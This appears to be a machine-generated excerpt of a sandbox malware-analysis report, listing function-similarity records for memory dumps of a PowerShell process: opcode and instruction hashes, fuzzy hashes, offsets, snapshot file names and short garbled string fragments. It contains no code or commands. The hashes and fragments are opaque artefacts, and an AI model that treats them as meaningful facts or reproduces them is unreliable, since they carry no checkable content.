                                                      • Instruction ID: a45183722a82ca75d5a931b58d6fe2b121deeae7ec4b3564a5cb847468be5562
                                                      • Opcode Fuzzy Hash: 22a90f3d63c1b9f08c0f9210f09f08ef106b79d6d61c41d81db26a95a6e33838
                                                      • Instruction Fuzzy Hash: DA122EB4A01315DFDB64CB24C990BDAB7B2FF45304F1084AAD949AB751CB71AD82CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$(ful$4'kq$4'kq$4'kq$4'kq$x.fk$-fk
                                                      • API String ID: 0-1258633638
                                                      • Opcode ID: da73a9af0473ab68903e4694a79fa758bcf6479b6a32bc14bff892bf9467b336
                                                      • Instruction ID: 42b94727ba44eb36da13df6fc992804a480241f29e8ff49458a200800af3b51e
                                                      • Opcode Fuzzy Hash: da73a9af0473ab68903e4694a79fa758bcf6479b6a32bc14bff892bf9467b336
                                                      • Instruction Fuzzy Hash: 2BE190B0A402059FDB14DB68C541BAFBBB3AF88304F14C869D8056F396CF76ED568B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'kq$4'kq$$kq$$kq$$kq
                                                      • API String ID: 0-1023320533
                                                      • Opcode ID: 763a710ac9419c031408d79af2643b02bd35cfedc2f7b125607981b943ba0972
                                                      • Instruction ID: e5cc8b635e66f1274acc5b3e56e56090e1a2d16a1bc781dd3084107ebf135fe9
                                                      • Opcode Fuzzy Hash: 763a710ac9419c031408d79af2643b02bd35cfedc2f7b125607981b943ba0972
                                                      • Instruction Fuzzy Hash: B21226B97042069FDB258B7994506ABBBE2AFC6310F28C46BD805CB363DB35DC45C7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$4'kq$4'kq$x.fk$-fk
                                                      • API String ID: 0-1075056351
                                                      • Opcode ID: 1e2a3e1c98ca20b405066ab0a9bb5b79fa1401bffd2352dbda68a86f4528a2be
                                                      • Instruction ID: 22f1f63bd2acb9fc47bc5866304d42a7e9afdee73e52a78c5fc403b8917acf87
                                                      • Opcode Fuzzy Hash: 1e2a3e1c98ca20b405066ab0a9bb5b79fa1401bffd2352dbda68a86f4528a2be
                                                      • Instruction Fuzzy Hash: 92C1BFB0A00205DFDB14CB54C541BAEFBB3AF89304F15C46AE8056F3A6CB75E956CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$(ful$(ful$(ful
                                                      • API String ID: 0-100295639
                                                      • Opcode ID: 9715daf8facfcd4219bf23b3b501b5831ff36adf533d12dcbac18e465177faac
                                                      • Instruction ID: 722a65d5d687c2b54918c8da3df64bab1e3d5e437d2180a65fe950667aee2231
                                                      • Opcode Fuzzy Hash: 9715daf8facfcd4219bf23b3b501b5831ff36adf533d12dcbac18e465177faac
                                                      • Instruction Fuzzy Hash: 3F524DB4B00245DFD714CF98D941AAABBB2EF85314F15C16AE8059F756CB72EC82CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'kq$4'kq$4'kq$4'kq
                                                      • API String ID: 0-1293621312
                                                      • Opcode ID: b39f8d4f2f422ed4c677e844273d45362ae31972e6a3ee5c5ce3ebff58b6474d
                                                      • Instruction ID: 040cdb92b4069ddd897276f035e1b4bdd459a652723a96983a805d3bed825a57
                                                      • Opcode Fuzzy Hash: b39f8d4f2f422ed4c677e844273d45362ae31972e6a3ee5c5ce3ebff58b6474d
                                                      • Instruction Fuzzy Hash: 1C0237B1B042058FCB158B6998116ABBBE6AFC1210F2484BBDD05CB397DF36DC56C7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194295382.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_4910000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Hoq$$kq$$kq
                                                      • API String ID: 0-2950107677
                                                      • Opcode ID: bf82b7ea60ae3a7b9464512bef1b066b309e9b9de1a3613f8dfd52097818dc5a
                                                      • Instruction ID: 70164546cd814e233df816820f034f238e0dfb34dd8cc0bd71c30ea13a7d1d5e
                                                      • Opcode Fuzzy Hash: bf82b7ea60ae3a7b9464512bef1b066b309e9b9de1a3613f8dfd52097818dc5a
                                                      • Instruction Fuzzy Hash: 552231347002289FDB25DB24D8557AEBBB6BF89304F1444A9D40AAB365DF35EE85CF80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
Function records (Joe Sandbox IDA Plugin, PowerShell process memory). Two memory dumps are referenced, both "based on PE: false":

- Dump A: Source File 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset 07450000, Snapshot File hcaresult_1_2_7450000_powershell.jbxd
- Dump B: Source File 00000001.00000002.2194295382.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset 04910000, Snapshot File hcaresult_1_2_4910000_powershell.jbxd

In every record the API ID is empty and the Opcode Fuzzy Hash is identical to the Opcode ID, so the two are shown as one column. String ID and API String ID come from the record's Strings section; records without a Strings section have those cells blank.

| # | Dump | String ID | API String ID | Opcode ID (= Opcode Fuzzy Hash) | Instruction ID | Instruction Fuzzy Hash | Uniqueness Score |
|---|------|-----------|---------------|---------------------------------|----------------|------------------------|------------------|
| 1 | A | $kq$$kq$$kq | 0-2086306503 | 079166e4592a8d1ab2d01b14b98165e163c0cb76c0942cc9b484b188716e2b7f | d33396019a938016c6c8226264491a2394d39c240f90ae37e7a9f1b0f4da6748 | 74213BB131420E6BDB3859BE98017A7B6D79BC1710F65883BAD06CB383DD39D8458761 | -1.00% |
| 2 | A | (ful$(ful | 0-51623107 | 2571abd4ca185bcab89d9b3fbe5eb01aecf4450a0083a03fb8add13447fa498b | d77fe79f81a8d8e5dcad609a80d9cee0e211c964c64d66fe44fa0e03c0e0e80b | 03127EB4B002099FD714CB98D551FAABBF2AF89314F14C16AD8199F756CB32EC42CB91 | -1.00% |
| 3 | A | (ful$(ful | 0-51623107 | b3a79aa90366cb814d294521ed45d60eb1152c850cf1e46b65fbd69f0641272b | 53ac8e210ac12df6f05759a7500694b2e6a9184d26f740ead10097ded388fbda | C21249B5A00245DFDB14CF98C941EAABBB2EF85314F15C16AE9055F762CB72EC82CB41 | -1.00% |
| 4 | A | (ful$h2hk | 0-2461700909 | e56e7c5523cbd8616a2fa232ef10028da71ce945b8a683649a39f4ba1ded085b | ea0d703c65cfc2d817d2fdf5aca505045dbb83e4e5a4042ea489336005820cfe | D50248B4A00209DFDB14CF58C551FAABBB2EF89314F15C16AE9059B356CB72EC42CB91 | -1.00% |
| 5 | A | $kq$$kq | 0-3550614674 | 9e84b409c96fed6a75285195cb75cda29dce8f5461b27e6000dfcbf7d1b54c69 | bef5172e9585b124aaeb8c39695b186c236d5d342e575f4d144aa771e721e4d8 | C8213BF121838D2FDB32097988117E37FA54F82750F6A4467ED45CB393D9399944C761 | -1.00% |
| 6 | A | (ful | 0-517230495 | be96e6fba4cdbbcfa6e4ba8e9c2145d4c6da9c544c3c73f18b5c6f7a864715a6 | 8eebc2dbf56681607f4ea38facd5aeaeb0faf0a5fa85061b82d3a530519f5d3e | 6D222AB4A00245DFDB14CF98D941EAABBB2EF85314F15C16AE8055F756CB72EC82CB40 | -1.00% |
| 7 | A | (ful | 0-517230495 | c6ade1aa33c331029a1c0b28dcd987e372d311073b0bb8213351dc812dc505df | 620e9ae06d3858c0988de8778f8315914b6abc985e518e4dd9b4e22c5b326705 | 3F2219B4A00245DFDB14CF98D941AAABBB2EF85314F15C16AE9095F756CB72EC82CB40 | -1.00% |
| 8 | A | (ful | 0-517230495 | dc1bd2d8800c1f8a092619e16b10b85f4565d67373ea3eed8aa0e0a2e11d19ef | d777d56290e9c9613f7f48b1e3f6c933fc11c905138b47c997ebcb1233a3c90e | C6F139B4A00209DFDB14CF59C550EAABBF2BF89314F15C16AE9199B356C732EC42CB91 | -1.00% |
| 9 | A | x.fk | 0-1423657076 | 196765c87b532f8be93dcfa0ca72203647721ad960fec15fd2607f45f3136568 | 810422bf2118fe06d75d3fe69a2ad55c641694b0a061acb3c48244bda59e46f9 | 8131D4B1B40204AFD704AB68C911FAF7BA3EBC4300F108825E9016F7A5CE76ED528BD1 | -1.00% |
| 10 | A | x.fk | 0-1423657076 | 9fd8152d3338a5732ce999c65c7e01d6fc9b77510e9c29ccdf532505b2290804 | 8d8816635e86647edc2c9976fa2733eb17bfac9609f6f14fc5dc415de517ac21 | FF21B2B1A50204DFD7049B68C945FEFBBB3EB84314F108925E9056F362CA76DD518B91 | -1.00% |
| 11 | B | | | fc02bc5dbecb6a1806eb37ceb04a6fd60cc4d1d7315bfc9040fa35e56ba0d854 | efe13a34c2acf84ebd0321e51cbe71c418bd62f9f2b43a1dd006b4a472e1c8d4 | 58F11A74A01209DFDB15CF98D584A9DBBB2FF88310F258569E815AB365C731ED82CB90 | -1.00% |
| 12 | B | | | d18e396fb4702f530116f4d1efb92fb427ac0dbca85300842878350bda4e2d27 | 61e28c90a06a7abfe0ece5db33080d8a373c730ccec6b4425e78a9d70f6e8ca6 | 6FC1BE35A002099FCB14DFE4D944A9DBBB6FF85310F2585A9E406AB365DB34ED8ACB40 | -1.00% |
| 13 | B | | | 20b7612757dfcb3ff2893e7f13b471e3f37974bae49945f97cde0db539173015 | 5ff0a7588ae6f19ce5de8e97bf212d15300243f07ada2194e5d86819a68536f0 | D2B15C70E0020EDFDB10DFA8D99579DBBF5BF48314F148539D819AB268EB74A885CB81 | -1.00% |
| 14 | B | | | b0ef3e39e218851360541d6adb5095653cee14273f37ade4442f763646fd107c | a28e446a91daa5a7f02aa3d4ea0ca9a014616d9d5fd316879844a6da1e3c46e6 | CDA1D274A042498FC706DF59C4949AEFBB1FF49310B2485AAD445EB3A5C735FC41CBA0 | -1.00% |
| 15 | B | | | 37def5f29fd584caf0d88e8716dcdca798511d55fcc36f25930791c006813a61 | cc9f9478dd6b1f5b37bd9128c8d676343b7744183e978298a4fc12df7464c231 | 49719F70A002498FCB14DFA8D884A9DBBF6FF85314F1489B9D415DB665DB31AC46CB90 | -1.00% |
| 16 | B | | | c75f781bc6642a19756732d3013734b92da2f1059f820bda511938c9ddd09aa5 | c8ba5d797b891a8605555b7f2306f2829bbb896527f2867c7807a46f98093bee | 8A714E70A00219DFDB14DFB4D884BADBBF6BF88304F148469D412AB7A5DB35AD46CB50 | -1.00% |
| 17 | A | | | 6e4e8d5541a5c691cad5f39c6b29c7a5462369db7d9042ecff1f980299da56cf | c9f0b7d2d73c1c6bb72fde0f56fa016674e7ca3e45fd44c486e1aa7a23ff9723 | AC41D6F2A10302DFCB22CF248951AEB7BA2AB85214B1540BBDD049B357DB35DD55C7A1 | -1.00% |
| 18 | B | | | 1fd8ea32d06451ebf42c29715d6bb23c47bfaaf4f230ac07f0ad1df194503400 | 756f49c86be64522071f94bd75304e07f5f33954e3036827fb4bcc29f993a0fe | A8416C39B002098FDB14DF65C954BAE7BB6EF88351F1444A9E406EB3B0DB35AD41CB90 | -1.00% |
| 19 | B | | | ec6e2a7b56f04309ab8167f3f2fb8a54d0e36ef666efb2ef962288c1df78de90 | 53ac0f9a51c859a6eaad85cb9823e11d7e74df381e0e89680996284aa7bdf658 | D451E674A00209EFDB05CF98D584A9DFBB2FF88310F248559E404AB365C736ED86CB90 | -1.00% |
| 20 | B | | | 84f5e85f37ec288becc107c67aa870592739b421151f527dabbe1f565e634153 | a4fc70621459957cb5f6e3c237ba9788b50da3d16b2118d37fb2ca263f50a92d | 62418C70A002099FDB14DFA9C894BADBBF2BF88304F14847DD402AB7A5DB75A945CB90 | -1.00% |
| 21 | B | | | 14a162c371fe47b442b41accaf628189d9377498dcccd8e0f15188779515f93a | befe3a4e3588d1c6383c691fdb30113c464fe98e1c48e734822440e8affd11c4 | 534169B8A001099FCB09CF59C5949AEFBB1FF48310B1185A9D905AB3A4C736FC50CFA4 | -1.00% |
| 22 | A | | | 2fbf66315f05e689f972cda0c31af5df9e6dd9c955d541a31083b5e3063c7671 | 2a58dd74d8335043360f25565ea73abfb127ac2451a52b222217ac38f206c08c | 132149B134024A6BDB345ABA8901BBB76C79BC6315F24C43BA905CB383EE35D881C360 | -1.00% |
| 23 | B | | | b922f7f81bfe93414258cb127d85194d988d475fb3086e18b241df98f0e25db8 | 8be94e9496f7fec8edeccc6d3f06f06d22516b8b03808d1af88c3235e260187a | 0B311B30A042189FCB25DB64D8517EEBBB6AF89345F1044E9D40AAB361CB35AE85CF80 | -1.00% |
| 24 | B | | | 5330a3d9e9d01bc823767f4a2fc7d828e2a654ff73ea312abf55fd0bdb344d2f | 0cf943eb10fd7c66d238daa5a2c09f463f41818bb72a8706c5ced18079a1d240 | 21312774A0060ADFCB14CF99C5849AAFBB1FF48310B2586A9D859EB3A5C331FC51CB90 | -1.00% |
| 25 | A | | | 08a882e357d1da21f89a9ba26d3b0e42505194434e587d6fbbb731e372bfd6c6 | f0e3e8a84b9f32a1c165d6c937767dd4c92027190e071316cd52d59401c09c69 | 06214CB130438A6BDB354A7649117F73F965F82304F28846BE940CB3D3EA399985C321 | |

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 603e04287804d178caab95c83ce48d229ad956a0885b5e70e6b3eecea5aa6edc
                                                      • Instruction ID: ed5003d40f6f801db71b2b74848ecb471caa3caa23f7ceb1402a53f70075efaf
                                                      • Opcode Fuzzy Hash: 603e04287804d178caab95c83ce48d229ad956a0885b5e70e6b3eecea5aa6edc
                                                      • Instruction Fuzzy Hash: E601F77631021A8BCB2455AAA4007BBB79ADBC6222F14C83FED55D7752D636C846C7A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194295382.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_4910000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b470c0d3320bca73b274c86212a8c44bdbf9be94fadf4237965010c75b3b2383
                                                      • Instruction ID: c82558be209b35c98a87d8b25b90c5371e2d56e3357b7bc710d1860af768bf78
                                                      • Opcode Fuzzy Hash: b470c0d3320bca73b274c86212a8c44bdbf9be94fadf4237965010c75b3b2383
                                                      • Instruction Fuzzy Hash: FD11C634A00209AFDB05CF98D884E9DFBB2FF48314F298558E405AB365C771B886CB80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194064519.0000000000C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_c2d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 841931d0a17c2f5a3bb18d9f77396e7a305e049103085433441ea6d69131cc7f
                                                      • Instruction ID: 60adf5850f9b4f02fb3c3f5da2afb0c72a7d7627d4515719a75a69b85f56a541
                                                      • Opcode Fuzzy Hash: 841931d0a17c2f5a3bb18d9f77396e7a305e049103085433441ea6d69131cc7f
                                                      • Instruction Fuzzy Hash: C4014C6100E3C09ED7128B259C94B52BFB4EF53224F1DC0DBD8988F1A3C2699C49C772
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194064519.0000000000C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_c2d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70c45552e9f05bff5bbbe4c9ae7ed41c0ad6b9401653ad61f0b839f170c1992c
                                                      • Instruction ID: cac870ca395027fa2e81a1c6dbc9f354ff68ac6dc9a05328eb095eaddcb3375b
                                                      • Opcode Fuzzy Hash: 70c45552e9f05bff5bbbe4c9ae7ed41c0ad6b9401653ad61f0b839f170c1992c
                                                      • Instruction Fuzzy Hash: 93012B310083109EE7104A2AEDC4767BF98EF61324F18C429EC5A4F556C679DD81C6B1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2377e93b61963aaa7b41fdef540accb4c01f34470340d0171542db1f868f7815
                                                      • Instruction ID: 17403f708eef190881b4b872a36fe84b1cccaea283f45285482b395b8c6ed095
                                                      • Opcode Fuzzy Hash: 2377e93b61963aaa7b41fdef540accb4c01f34470340d0171542db1f868f7815
                                                      • Instruction Fuzzy Hash: 7FB012712061404FC301CB10C850440BB209FA310431CC0CAD4048F263DB33DE0BD700
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,Sul$,Sul$4'kq$4'kq$4'kq$4'kq$d5ek$tPkq$tPkq$xSul$$kq$$kq$$kq$$kq$kl$kl
                                                      • API String ID: 0-2423150153
                                                      • Opcode ID: 50dcbfa56ef7b61492e11a07705227760e4afa09a61d239dff1aece27b14901e
                                                      • Instruction ID: 75d9470845b465e799c71fb8d202b06cca17be947be8358268e2d0908de6de41
                                                      • Opcode Fuzzy Hash: 50dcbfa56ef7b61492e11a07705227760e4afa09a61d239dff1aece27b14901e
                                                      • Instruction Fuzzy Hash: 95E15DB1B043569FCB264B7898017EBBFA2AF82310F2484BBD945CB353DA35D855C7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'kq$4'kq$tPkq$tPkq$$kq$$kq$$kq$$kq$kl$kl
                                                      • API String ID: 0-2144872774
                                                      • Opcode ID: 58b1a8caa3629f26aeedc6ea6a6fd4bbe9114f0b0cf1937f9b3187b00440ece6
                                                      • Instruction ID: 7617b94947d34cbdbb6b27dc67ffdc12f0c5f63643bb5b2bfb231e1490df5193
                                                      • Opcode Fuzzy Hash: 58b1a8caa3629f26aeedc6ea6a6fd4bbe9114f0b0cf1937f9b3187b00440ece6
                                                      • Instruction Fuzzy Hash: 55A149B13043459FC7269B6998006BBBBF6AFC6210F24847BD905CB393DA35DD46C7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'kq$84sl$84sl$tPkq$tPkq$$kq$(qq$(qq$(qq
                                                      • API String ID: 0-4182690792
                                                      • Opcode ID: 0913ed81e4be8a2a84660103ea3d40833d8ca2a5ea42b65f67b9eb3e590033cb
                                                      • Instruction ID: af35749d6a98adef0a0f28cff6a1cae0fff834517fbf54f7e443722dd313d5f8
                                                      • Opcode Fuzzy Hash: 0913ed81e4be8a2a84660103ea3d40833d8ca2a5ea42b65f67b9eb3e590033cb
                                                      • Instruction Fuzzy Hash: 3A71B3B0A042669FDB28CF14C540BEBBBA1BB85311F198457EC05AF392D731DE81CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'kq$4'kq$tPkq$tPkq$$kq$$kq$$kq$$kq
                                                      • API String ID: 0-1263425659
                                                      • Opcode ID: 7b29266f56cbfb17529ef82dcb3c41cf3f3b8a5a2011b308f7fade18e5eab81a
                                                      • Instruction ID: 4ff081cb091dba6e48a23b4f82150a89d8181a5ba457a7e547ba781f31dcd4c3
                                                      • Opcode Fuzzy Hash: 7b29266f56cbfb17529ef82dcb3c41cf3f3b8a5a2011b308f7fade18e5eab81a
                                                      • Instruction Fuzzy Hash: 9251D4B1B002059FDB289F64D5106EBBFA2AF85210F24C66BDC119F396DB36D847CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Tek$4'kq$4'kq$XYul$XYul$tPkq$tPkq
                                                      • API String ID: 0-1630410640
                                                      • Opcode ID: d4a00819638fac8c9a01427b9b2baaae0de4d90f239de12cfa5b82a1b3071f12
                                                      • Instruction ID: 188bde2c896369c7e7995bc74c9364434dbbfbe69e7d8448a1d21814c8c299ba
                                                      • Opcode Fuzzy Hash: d4a00819638fac8c9a01427b9b2baaae0de4d90f239de12cfa5b82a1b3071f12
                                                      • Instruction Fuzzy Hash: 488129B1B053559FCB148B699804AABBBAAEFC5310F24C46BD905CB353DE31DC41C7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'kq$84sl$tPkq$$kq$$kq$$kq
                                                      • API String ID: 0-2319697288
                                                      • Opcode ID: d0fe20de72d44358047ad1eec884693ccc88b45afefaa23a75f4f6b03181e520
                                                      • Instruction ID: 009c223026f144c3fcb2056d91b701cf435e0824d04b8a154f74cef09ca61dfe
                                                      • Opcode Fuzzy Hash: d0fe20de72d44358047ad1eec884693ccc88b45afefaa23a75f4f6b03181e520
                                                      • Instruction Fuzzy Hash: 4261C3F161020AEFDB248E54C544BFB77A2AB45311F688467EC045B3D6CB35ED89CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'kq$4'kq$$kq$$kq$$kq
                                                      • API String ID: 0-1023320533
                                                      • Opcode ID: d2d7bc5e6c10e90581de3f55db1c27e15d9ad33812b7e71670e46fdba22f592b
                                                      • Instruction ID: 96aff80e07deec2832a82af63718a28e4b76c0183cb17237f938acaa6c691d68
                                                      • Opcode Fuzzy Hash: d2d7bc5e6c10e90581de3f55db1c27e15d9ad33812b7e71670e46fdba22f592b
                                                      • Instruction Fuzzy Hash: 124124B970430A9FCB258F3488102FF7BA2AB82311F1584ABD805CB3A2DB35C946C791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (okq$(okq$(okq$(okq
                                                      • API String ID: 0-1817140900
                                                      • Opcode ID: 9c2735dad0d13d0f1bf767d072c9926c4f75ea3042f43284a6b3fda94712a5ca
                                                      • Instruction ID: 8403fc858e3c3492b0395dcd4eb71b39d98f124c7a02dbe755eca002f97623d7
                                                      • Opcode Fuzzy Hash: 9c2735dad0d13d0f1bf767d072c9926c4f75ea3042f43284a6b3fda94712a5ca
                                                      • Instruction Fuzzy Hash: 4EF1F5B1B04209DFCB159F68D880BEB7BA2AF81311F14C46BE815CB396DB35D855CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 84sl$84sl$tPkq$tPkq
                                                      • API String ID: 0-2302203880
                                                      • Opcode ID: b54a906fa5130a65fd80326175a5b2598ea0cae115085e239ce88f8306df6490
                                                      • Instruction ID: 40b84df7a5f353a7a2dab4b1c01f056ed2e13484e0bb34bfedc7847d418f18d1
                                                      • Opcode Fuzzy Hash: b54a906fa5130a65fd80326175a5b2598ea0cae115085e239ce88f8306df6490
                                                      • Instruction Fuzzy Hash: E6912BF17002069FCB249F69D840AABBBA6BF85311F28C46BDC059B396CA75DC45C7A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$(ful$(ful$(ful
                                                      • API String ID: 0-100295639
                                                      • Opcode ID: 0b642ab9277fd29693f143dbe62c71cfe568953cd8ca474fb59ee4c2a61727f0
                                                      • Instruction ID: ba9c55c2b368019837b2f02d53a92dfeeea77f192e0a636c1ba8cbeea50e0394
                                                      • Opcode Fuzzy Hash: 0b642ab9277fd29693f143dbe62c71cfe568953cd8ca474fb59ee4c2a61727f0
                                                      • Instruction Fuzzy Hash: D67180B0E01205DFCB14DF98C545ABAFBB3AF88310F14856AD805AB766DB32DD61CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $kq$$kq$$kq$$kq
                                                      • API String ID: 0-2881790790
                                                      • Opcode ID: 7a1ec50747a969252c4ee1fdbfb9132c3ae75876c1790db43f161dc4feb60a24
                                                      • Instruction ID: 7264d5841aa16d15399784c572a88822cac5c6171087e67288369b87216c5342
